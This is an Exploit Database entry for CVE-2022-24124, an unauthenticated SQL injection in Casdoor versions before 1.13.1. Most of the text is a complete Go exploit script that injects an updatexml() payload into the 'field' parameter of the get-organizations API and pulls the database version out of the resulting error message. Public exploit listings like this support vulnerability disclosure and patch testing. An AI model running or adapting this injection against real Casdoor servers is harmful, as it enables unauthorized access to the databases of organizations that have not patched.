Casdoor 1.13.0 – SQL Injection (Unauthenticated)

• Exploit Database
• 16 阅读

• 作者： Mayank Deshmukh
  日期： 2022-02-28
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50792/

• // Exploit Title: Casdoor 1.13.0 - SQL Injection (Unauthenticated) 
  // Date: 2022-02-25
  // Exploit Author: Mayank Deshmukh
  // Vendor Homepage: https://casdoor.org/
  // Software Link: https://github.com/casdoor/casdoor/releases/tag/v1.13.0
  // Version: version < 1.13.1
  // Security Advisory: https://github.com/advisories/GHSA-m358-g4rp-533r
  // Tested on: Kali Linux
  // CVE : CVE-2022-24124
  // Github POC: https://github.com/ColdFusionX/CVE-2022-24124
  
  // Exploit Usage : go run exploit.go -u http://127.0.0.1:8080
  
  package main
  
  import (
  	"flag"
  	"fmt"
  	"html"
  	"io/ioutil"
  	"net/http"
  	"os"
  	"regexp"
  	"strings"
  )
  
  func main() {
  	var url string
  	flag.StringVar(&url, "u", "", "Casdoor URL (ex. http://127.0.0.1:8080)")
  	flag.Parse()
  
  	banner := `
  -=Casdoor SQL Injection (CVE-2022-24124)=- 
  - by Mayank Deshmukh (ColdFusionX)
  
  `
  	fmt.Printf(banner)
  	fmt.Println("[*] Dumping Database Version")
  	response, err := http.Get(url + "/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,version(),null)")
  
  	if err != nil {
  		panic(err)
  	}
  
  	defer response.Body.Close()
  
  	databytes, err := ioutil.ReadAll(response.Body)
  
  	if err != nil {
  		panic(err)
  	}
  
  	content := string(databytes)
  
  	re := regexp.MustCompile("(?i)(XPATH syntax error.*&#39)")
  
  	result := re.FindAllString(content, -1)
  	
  	sqliop := fmt.Sprint(result)
  	replacer := strings.NewReplacer("[", "", "]", "", "&#39", "", ";", "")
  	
  	finalop := replacer.Replace(sqliop)
  	fmt.Println(html.UnescapeString(finalop))
  
  
  	if result == nil {
  		fmt.Printf("Application not vulnerable\n")
  		os.Exit(1)
  	}
  
  }